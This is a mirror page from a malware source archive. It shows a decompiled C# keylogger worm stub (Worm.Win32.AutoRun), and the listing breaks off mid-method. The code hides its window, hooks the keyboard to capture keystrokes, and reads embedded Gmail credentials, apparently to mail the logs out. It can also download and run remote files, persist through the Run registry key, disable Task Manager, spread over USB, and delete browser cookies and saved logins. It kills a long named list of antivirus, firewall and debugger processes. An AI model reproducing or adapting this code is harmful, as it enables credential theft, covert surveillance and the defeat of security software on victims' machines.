mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
873 lines
25 KiB
C#
873 lines
25 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Form1
|
|||
|
// Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using Microsoft.Win32;
|
|||
|
using My;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.IO;
|
|||
|
using System.Net;
|
|||
|
using System.Net.Mail;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
using System.Threading;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
[DesignerGenerated]
|
|||
|
public class Form1 : Form
|
|||
|
{
|
|||
|
private IContainer components;
|
|||
|
[AccessedThroughProperty("TextBox1")]
|
|||
|
private TextBox _TextBox1;
|
|||
|
[AccessedThroughProperty("Timer1")]
|
|||
|
private System.Windows.Forms.Timer _Timer1;
|
|||
|
[AccessedThroughProperty("Timer2")]
|
|||
|
private System.Windows.Forms.Timer _Timer2;
|
|||
|
[AccessedThroughProperty("Timer4")]
|
|||
|
private System.Windows.Forms.Timer _Timer4;
|
|||
|
[AccessedThroughProperty("TextBox2")]
|
|||
|
private TextBox _TextBox2;
|
|||
|
[AccessedThroughProperty("TextBox3")]
|
|||
|
private TextBox _TextBox3;
|
|||
|
private string gmailpwd;
|
|||
|
private string gmailusr;
|
|||
|
private string tmrinterval;
|
|||
|
private string exename;
|
|||
|
private string downloadenabled;
|
|||
|
private string downloadurl;
|
|||
|
private string errortitle;
|
|||
|
private string errormessage;
|
|||
|
private string anties;
|
|||
|
private string enablelink;
|
|||
|
private string startup;
|
|||
|
private string cb6;
|
|||
|
private string cb7;
|
|||
|
private string cb8;
|
|||
|
private string cb9;
|
|||
|
private const string Fitz = "-!_@Fitz-@_!";
|
|||
|
[AccessedThroughProperty("K")]
|
|||
|
private clannad _K;
|
|||
|
private string elsf;
|
|||
|
private string[] Settings;
|
|||
|
private string str1n;
|
|||
|
private string path;
|
|||
|
private IPHostEntry adresipnes;
|
|||
|
|
|||
|
public Form1()
|
|||
|
{
|
|||
|
this.Load += new EventHandler(this.Form1_Load);
|
|||
|
this.K = new clannad();
|
|||
|
this.str1n = (string) null;
|
|||
|
this.path = Path.GetTempPath();
|
|||
|
this.adresipnes = Dns.GetHostByName(Dns.GetHostName());
|
|||
|
this.InitializeComponent();
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerNonUserCode]
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (!disposing || this.components == null)
|
|||
|
return;
|
|||
|
this.components.Dispose();
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[DebuggerStepThrough]
|
|||
|
private void InitializeComponent()
|
|||
|
{
|
|||
|
this.components = (IContainer) new System.ComponentModel.Container();
|
|||
|
this.TextBox1 = new TextBox();
|
|||
|
this.Timer1 = new System.Windows.Forms.Timer(this.components);
|
|||
|
this.Timer2 = new System.Windows.Forms.Timer(this.components);
|
|||
|
this.Timer4 = new System.Windows.Forms.Timer(this.components);
|
|||
|
this.TextBox2 = new TextBox();
|
|||
|
this.TextBox3 = new TextBox();
|
|||
|
this.SuspendLayout();
|
|||
|
TextBox textBox1_1 = this.TextBox1;
|
|||
|
Point point1 = new Point(0, 0);
|
|||
|
Point point2 = point1;
|
|||
|
textBox1_1.Location = point2;
|
|||
|
this.TextBox1.Name = "TextBox1";
|
|||
|
TextBox textBox1_2 = this.TextBox1;
|
|||
|
Size size1 = new Size(100, 20);
|
|||
|
Size size2 = size1;
|
|||
|
textBox1_2.Size = size2;
|
|||
|
this.TextBox1.TabIndex = 0;
|
|||
|
TextBox textBox2_1 = this.TextBox2;
|
|||
|
point1 = new Point(104, 80);
|
|||
|
Point point3 = point1;
|
|||
|
textBox2_1.Location = point3;
|
|||
|
this.TextBox2.Name = "TextBox2";
|
|||
|
TextBox textBox2_2 = this.TextBox2;
|
|||
|
size1 = new Size(100, 20);
|
|||
|
Size size3 = size1;
|
|||
|
textBox2_2.Size = size3;
|
|||
|
this.TextBox2.TabIndex = 1;
|
|||
|
TextBox textBox3_1 = this.TextBox3;
|
|||
|
point1 = new Point(104, 107);
|
|||
|
Point point4 = point1;
|
|||
|
textBox3_1.Location = point4;
|
|||
|
this.TextBox3.Name = "TextBox3";
|
|||
|
TextBox textBox3_2 = this.TextBox3;
|
|||
|
size1 = new Size(100, 20);
|
|||
|
Size size4 = size1;
|
|||
|
textBox3_2.Size = size4;
|
|||
|
this.TextBox3.TabIndex = 2;
|
|||
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
size1 = new Size(10, 10);
|
|||
|
this.ClientSize = size1;
|
|||
|
this.Controls.Add((Control) this.TextBox3);
|
|||
|
this.Controls.Add((Control) this.TextBox2);
|
|||
|
this.Controls.Add((Control) this.TextBox1);
|
|||
|
this.FormBorderStyle = FormBorderStyle.None;
|
|||
|
this.MaximizeBox = false;
|
|||
|
this.MinimizeBox = false;
|
|||
|
this.Name = nameof (Form1);
|
|||
|
this.Opacity = 0.0;
|
|||
|
this.ShowIcon = false;
|
|||
|
this.ShowInTaskbar = false;
|
|||
|
this.Text = nameof (Form1);
|
|||
|
this.ResumeLayout(false);
|
|||
|
this.PerformLayout();
|
|||
|
}
|
|||
|
|
|||
|
internal virtual TextBox TextBox1
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._TextBox1;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
EventHandler eventHandler = new EventHandler(this.TextBox1_TextChanged);
|
|||
|
if (this._TextBox1 != null)
|
|||
|
this._TextBox1.TextChanged -= eventHandler;
|
|||
|
this._TextBox1 = value;
|
|||
|
if (this._TextBox1 == null)
|
|||
|
return;
|
|||
|
this._TextBox1.TextChanged += eventHandler;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal virtual System.Windows.Forms.Timer Timer1
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._Timer1;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
|
|||
|
if (this._Timer1 != null)
|
|||
|
this._Timer1.Tick -= eventHandler;
|
|||
|
this._Timer1 = value;
|
|||
|
if (this._Timer1 == null)
|
|||
|
return;
|
|||
|
this._Timer1.Tick += eventHandler;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal virtual System.Windows.Forms.Timer Timer2
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._Timer2;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
|
|||
|
if (this._Timer2 != null)
|
|||
|
this._Timer2.Tick -= eventHandler;
|
|||
|
this._Timer2 = value;
|
|||
|
if (this._Timer2 == null)
|
|||
|
return;
|
|||
|
this._Timer2.Tick += eventHandler;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal virtual System.Windows.Forms.Timer Timer4
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._Timer4;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
|
|||
|
if (this._Timer4 != null)
|
|||
|
this._Timer4.Tick -= eventHandler;
|
|||
|
this._Timer4 = value;
|
|||
|
if (this._Timer4 == null)
|
|||
|
return;
|
|||
|
this._Timer4.Tick += eventHandler;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal virtual TextBox TextBox2
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._TextBox2;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox2 = value;
|
|||
|
}
|
|||
|
|
|||
|
internal virtual TextBox TextBox3
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._TextBox3;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox3 = value;
|
|||
|
}
|
|||
|
|
|||
|
private virtual clannad K
|
|||
|
{
|
|||
|
[DebuggerNonUserCode] get => this._K;
|
|||
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
{
|
|||
|
clannad.DownEventHandler downEventHandler = new clannad.DownEventHandler(this.K_Down);
|
|||
|
if (this._K != null)
|
|||
|
clannad.Down -= downEventHandler;
|
|||
|
this._K = value;
|
|||
|
if (this._K == null)
|
|||
|
return;
|
|||
|
clannad.Down += downEventHandler;
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern int GetForegroundWindow();
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch);
|
|||
|
|
|||
|
private void TextBox1_TextChanged(object sender, EventArgs e)
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private void Form1_Load(object sender, EventArgs e)
|
|||
|
{
|
|||
|
F7h5o2wX4skMmN8HU f7h5o2wX4skMmN8Hu = new F7h5o2wX4skMmN8HU();
|
|||
|
this.Hide();
|
|||
|
this.Visible = false;
|
|||
|
try
|
|||
|
{
|
|||
|
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read);
|
|||
|
this.gmailusr = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.gmailpwd = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.tmrinterval = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.exename = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.downloadenabled = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.downloadurl = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.enablelink = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.anties = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.startup = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.cb6 = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.cb7 = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.cb8 = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.cb9 = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.errortitle = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.errormessage = Strings.Space(checked ((int) FileSystem.LOF(1)));
|
|||
|
this.Settings = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "-!_@Fitz-@_!");
|
|||
|
if (Operators.CompareString(this.Settings[13], "True", false) == 0)
|
|||
|
{
|
|||
|
int num = (int) MessageBox.Show(this.Settings[15], this.Settings[14], MessageBoxButtons.OK, MessageBoxIcon.Hand);
|
|||
|
}
|
|||
|
if (Operators.CompareString(this.Settings[8], "True", false) == 0)
|
|||
|
{
|
|||
|
this.anserantiggenneko();
|
|||
|
this.antianekowtser();
|
|||
|
this.avarsernekochan();
|
|||
|
this.avergerneko();
|
|||
|
this.claromerchan();
|
|||
|
this.comderosama();
|
|||
|
this.edawrdelric();
|
|||
|
this.eftopstkun();
|
|||
|
this.macarfeechan();
|
|||
|
this.kaperskerneko();
|
|||
|
this.noremonkun();
|
|||
|
this.noretonekimblee();
|
|||
|
this.oofisescanalphonse();
|
|||
|
this.anteyolleydebegeeyuki();
|
|||
|
this.anteyoutpoestnagato();
|
|||
|
this.antaypeeceechilingharuhi();
|
|||
|
this.sandebocseenagisa();
|
|||
|
this.searvearproetektnyu();
|
|||
|
this.spieseweapalucard();
|
|||
|
this.wyresharkehavok();
|
|||
|
this.veeemchekmustang();
|
|||
|
}
|
|||
|
if (Operators.CompareString(this.Settings[9], "True", false) == 0)
|
|||
|
this.adtoostertarpichigo("wuauclt", Application.ExecutablePath);
|
|||
|
if (Operators.CompareString(this.Settings[5], "True", false) == 0)
|
|||
|
{
|
|||
|
MyProject.Computer.Network.DownloadFile(this.Settings[6], this.path + this.FileName(this.Settings[6]));
|
|||
|
Thread.Sleep(5000);
|
|||
|
Process.Start(this.path + this.FileName(this.Settings[6]));
|
|||
|
}
|
|||
|
if (Operators.CompareString(this.Settings[10], "True", false) == 0)
|
|||
|
usb.Usb1();
|
|||
|
if (Operators.CompareString(this.Settings[11], "True", false) == 0)
|
|||
|
{
|
|||
|
this.kielprocclust(true, true);
|
|||
|
this.deeleeteeiecookeeshawkeye(true);
|
|||
|
this.deeleeteemosilercookeeshoenhiem(true);
|
|||
|
}
|
|||
|
if (Operators.CompareString(this.Settings[12], "True", false) == 0)
|
|||
|
this.Timer4.Start();
|
|||
|
this.TextBox1.Text += Conversions.ToString(DateAndTime.Now);
|
|||
|
this.Timer1.Start();
|
|||
|
this.Timer2.Interval = Conversions.ToInteger(this.Settings[3]);
|
|||
|
this.Timer2.Start();
|
|||
|
this.K.CreateHook();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void K_Down(string Key) => this.TextBox1.Text += Key;
|
|||
|
|
|||
|
private void Timer4_Tick(object sender, EventArgs e)
|
|||
|
{
|
|||
|
if (!Conversions.ToBoolean(this.Settings[12]))
|
|||
|
return;
|
|||
|
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", (object) "1", RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
|
|||
|
public void kielprocclust(bool InternetExplorer, bool Firefox)
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int index = 0;
|
|||
|
while (index < processes.Length)
|
|||
|
{
|
|||
|
Process process = processes[index];
|
|||
|
if (Firefox)
|
|||
|
{
|
|||
|
if (process.MainWindowTitle.Contains("Mozilla Firefox"))
|
|||
|
process.Kill();
|
|||
|
else if (Operators.CompareString(process.ProcessName, "firefox.exe", false) == 0)
|
|||
|
process.Kill();
|
|||
|
}
|
|||
|
if (InternetExplorer)
|
|||
|
{
|
|||
|
if (process.MainWindowTitle.Contains("Internet Explorer"))
|
|||
|
process.Kill();
|
|||
|
else if (Operators.CompareString(process.ProcessName, "iexplore.exe", false) == 0)
|
|||
|
process.Kill();
|
|||
|
}
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void deeleeteeiecookeeshawkeye(bool Enable)
|
|||
|
{
|
|||
|
if (!Enable)
|
|||
|
return;
|
|||
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
|
|||
|
if (!Directory.Exists(folderPath))
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string file in MyProject.Computer.FileSystem.GetFiles(folderPath))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
MyProject.Computer.FileSystem.DeleteFile(file);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator<string> enumerator;
|
|||
|
enumerator?.Dispose();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void deeleeteemosilercookeeshoenhiem(bool Enable)
|
|||
|
{
|
|||
|
if (!Enable)
|
|||
|
return;
|
|||
|
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
|
|||
|
if (!Directory.Exists(str))
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
|
|||
|
{
|
|||
|
if (file.Contains("cookie"))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
MyProject.Computer.FileSystem.DeleteFile(file);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator<string> enumerator;
|
|||
|
enumerator?.Dispose();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator<string> enumerator;
|
|||
|
enumerator?.Dispose();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void deeleeteemosilersineonesarmstrong(bool Enable)
|
|||
|
{
|
|||
|
if (!Enable)
|
|||
|
return;
|
|||
|
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
|
|||
|
if (!Directory.Exists(str))
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
|
|||
|
{
|
|||
|
if (file.Contains("signon"))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
MyProject.Computer.FileSystem.DeleteFile(file);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator<string> enumerator;
|
|||
|
enumerator?.Dispose();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
IEnumerator<string> enumerator;
|
|||
|
enumerator?.Dispose();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void antianekowtser()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void anserantiggenneko()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void avarsernekochan()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void adtoostertarpichigo(string Name, string Path)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Name, (object) Path, RegistryValueKind.String);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void deeleteeetoostertarpichigo()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
|
|||
|
registryKey.DeleteValue("APPLICATIONTITLE", false);
|
|||
|
registryKey.Close();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void avergerneko()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void kaperskerneko()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avp", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void claromerchan()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void comderosama()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void edawrdelric()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void eftopstkun()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void macarfeechan()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void noremonkun()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "npfmsg", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void noretonekimblee()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void oofisescanalphonse()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void anteyolleydebegeeyuki()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void anteyoutpoestnagato()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "outpost", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void antaypeeceechilingharuhi()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void sandebocseenagisa()
|
|||
|
{
|
|||
|
label_0:
|
|||
|
int num1;
|
|||
|
int num2;
|
|||
|
try
|
|||
|
{
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
num1 = -2;
|
|||
|
label_1:
|
|||
|
int num3 = 2;
|
|||
|
if (!this.Text.Contains("#"))
|
|||
|
goto label_3;
|
|||
|
label_2:
|
|||
|
num3 = 3;
|
|||
|
this.Close();
|
|||
|
goto label_11;
|
|||
|
label_3:
|
|||
|
num3 = 5;
|
|||
|
label_4:
|
|||
|
num3 = 6;
|
|||
|
this.Show();
|
|||
|
goto label_11;
|
|||
|
label_6:
|
|||
|
num2 = num3;
|
|||
|
switch (num1 > -2 ? num1 : 1)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
int num4 = num2 + 1;
|
|||
|
num2 = 0;
|
|||
|
switch (num4)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
goto label_0;
|
|||
|
case 2:
|
|||
|
goto label_1;
|
|||
|
case 3:
|
|||
|
goto label_2;
|
|||
|
case 4:
|
|||
|
case 7:
|
|||
|
case 8:
|
|||
|
goto label_11;
|
|||
|
case 5:
|
|||
|
goto label_3;
|
|||
|
case 6:
|
|||
|
goto label_4;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
goto label_6;
|
|||
|
}
|
|||
|
throw ProjectData.CreateProjectError(-2146828237);
|
|||
|
label_11:
|
|||
|
if (num2 == 0)
|
|||
|
return;
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
|
|||
|
public void searvearproetektnyu()
|
|||
|
{
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
int num = checked (processes.Length - 1);
|
|||
|
int index = 0;
|
|||
|
while (index <= num)
|
|||
|
{
|
|||
|
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent.exe", false) == 0)
|
|||
|
processes[index].Kill();
|
|||
|
checked { ++index; }
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public void spieseweapalucard()
|
|||
|
{
|
|||
